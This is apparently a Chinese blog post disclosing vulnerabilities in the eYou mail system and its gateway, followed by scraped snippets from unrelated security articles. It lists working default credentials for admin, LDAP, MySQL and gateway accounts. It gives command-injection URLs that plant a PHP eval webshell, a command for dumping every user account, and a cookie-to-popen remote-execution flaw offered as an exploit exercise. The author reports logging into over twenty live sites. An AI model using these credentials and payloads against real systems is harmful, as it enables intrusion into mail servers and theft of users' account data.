eYou 億郵 郵箱系統漏洞

2022-06-18 22:27:21 字數 1526 閱讀 7080

** 1.預設配置漏洞

這裡的情況舊版新版都存在。首先預設的閘道器系統是跟郵件系統在乙個機器上的,訪問8080埠即可。

>

> 預設賬戶 admin aaaaa,部分站點還有eyoutest之類的賬戶,不知道是不是eyou的工作人員測試的時候留下忘記刪除的賬戶,同樣密碼為aaaaa

登入後直接匯出所有使用者。。。

> 預設ldap資訊:eyouadmin aaaaa

> 預設mysql資訊: root 密碼空

> 閘道器後台或

> 有三個預設賬戶,分別為

> admin:+-ccccc

> eyougw:admin@(eyou)

> eyouuser:eyou_admin

閘道器處的管理員是存放在mysql中,可是eyou產品在安裝過程中沒有任何提示要求更改此處密碼,算是官方留的後門嗎?

檢視投遞日誌可以檢視敏感資訊。

** 2.舊版閘道器漏洞

閘道器系統這裡問題挺嚴重的喔,只要能訪問到閘道器,只要在閘道器處能檢視到佇列什麼的,就能執行命令

利用url:

> php/mailaction1.php?action=x&index=738952509.37684;echo '<?php eval($_request[cmd]) ?>'>/opt/apache/htdocs/t1.php

> php/mailaction1.php?action=x&index=738952509.37684;ls>t1.php

index引數沒過濾,直接帶入執行了。

舊版閘道器很多處地方有類似問題的,認真看下**就發現了。

入侵者得到webshell之後,直接使用/var/eyou/sbin/userdb_extract domain就能匯出該域下所有使用者的賬戶資訊!

這裡的影響版本貌似是3.6-4.0

** 3.新版閘道器漏洞

新版閘道器比舊版的要安全多了。。。不過它之所以安全多了,是因為把**寫複雜了。。。把要研究的人都給繞暈了。。。

順便吐槽下這個新舊版本**變化也太大了把。。。

用前面發現的賬戶登入閘道器後台。我抓了一大堆**,然後自己寫指令碼來模擬登入,20+個站點沒有乙個修改了該處的密碼。。。所以這裡新版後台登入的成功率是很高的。

新版本的閘道器,對使用者預設輸入的引數都進行了過濾,過濾了什麼的,然後注射啊命令執行什麼的暫時還木有發現。

不過在管理配置那裡的風格管理,對上傳的風格包,系統沒有任何判斷就直接覆蓋到gw/css/目錄去了。

影響版本為閘道器4.0以後的版本

** 4.郵箱系統遠端執行漏洞

前面三個專案都或多或少都有條件限制,不夠勁爆,再來個勁爆的,只要郵箱對外訪問,就能直接getshell。

問題在這裡,這個檔案直接讀取cookie("cookie"),然後就帶入popen了,沒任何過濾,多好啊。

exp可以參考下面的**來寫,很簡單很弱智的漏洞

public function action_test()

常見的系統漏洞

未完待續 1 漏洞公告 cve 2017 1000367 sudo本地提權漏洞 2017年5月30日,國外安全研究人員發現在linux環境下,可以通過sudo實現本地提權的漏洞。該漏洞編號為cve 2017 1000367,它幾乎影響所有linux系統。漏洞編號 cve 2017 1000367漏洞...

linux系統漏洞lynis掃瞄

或者 yum enablerepo epel y install lynis 2.rz上傳壓縮包解壓 tar xzf lynis 2.7.4.tar.gz cd lyins lynis show groups 掃瞄的內容分類 掃瞄shells filesystems lynis tests from...

由0day漏洞看利用系統漏洞攻擊。

0day是乙個比較典型的系統漏洞看 是最初是某段xml的解析導致了系統崩潰。這個崩潰是由乙個call 引用了乙個已經被釋放的位址造成的。而這段位址剛剛好是指向了image src變數的http 後面的一段 這是乙個動態分配的結構含有函式位址。在被釋放後又錯誤的被呼叫引起的崩潰。漏洞攻擊有好多種,看過...